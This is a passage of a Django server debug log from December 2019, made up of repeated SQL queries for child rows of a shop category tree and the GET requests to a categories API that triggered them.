4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:21:46,352 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:21:46,354 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:21:46,356 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:21:46,359 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:21:46,362 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:21:46] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:21:48,813 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:21:48,821 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:21:48,826 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:21:48,831 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:21:48,836 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:21:48,840 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:21:48,844 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:21:48,848 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:21:48,853 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:21:48,858 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:21:48,862 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:21:48,866 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:21:48,870 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:21:48,874 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:21:48,880 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:21:48,883 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:21:48,887 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:21:48,891 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:21:48,895 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:21:48,902 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:21:48,906 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:21:48,910 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:21:48,914 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:21:48,918 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:21:48,922 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:21:48,928 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:21:48,932 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:21:48,936 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:21:48,939 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:21:48,943 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:21:48,949 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:21:48,953 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:21:48,957 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:21:48,961 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:21:48,964 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:21:48,971 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:21:48,975 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:21:48,979 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:21:48,983 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:21:48,986 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:21:48,990 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:21:48,995 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:21:48,999 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:21:49,003 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:21:49,008 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:21:49,011 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:21:49] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:21:56,342 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-18 09:21:56,350 utils 4252 140031721535232 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:21:56,357 utils 4252 140031747061504 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:21:56,367 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:21:56,375 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) [18/Dec/2019 09:21:56] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-18 09:21:56,379 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:21:56,386 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:21:56,390 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:21:56,394 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:21:56,398 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:21:56,402 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:21:56,409 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:21:56,413 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:21:56,417 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:21:56,421 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:21:56,425 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 